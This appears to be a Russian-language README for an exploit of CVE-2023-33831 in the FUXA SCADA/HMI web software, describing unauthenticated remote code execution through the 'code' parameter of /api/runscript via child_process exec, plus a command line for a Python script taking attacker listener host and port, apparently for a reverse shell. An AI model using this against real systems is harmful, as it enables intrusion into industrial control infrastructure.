
Описание и эксплойт CVE-2023-33831, затрагивающего программное обеспечение FUXA для веб-визуализации процессов (SCADA/HMI/Dashboard).
Уязвимость затрагивает компонент скриптов FUXA из-за отсутствия контроля или очистки входных данных, которые могут контролироваться пользователями, что позволяет использовать опасные методы, масштабируемые для удаленного выполнения кода. Затронутый маршрут — /api/runscript, где можно выполнять команды без аутентификации через параметр code методом POST с использованием модуля child_process через функцию exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>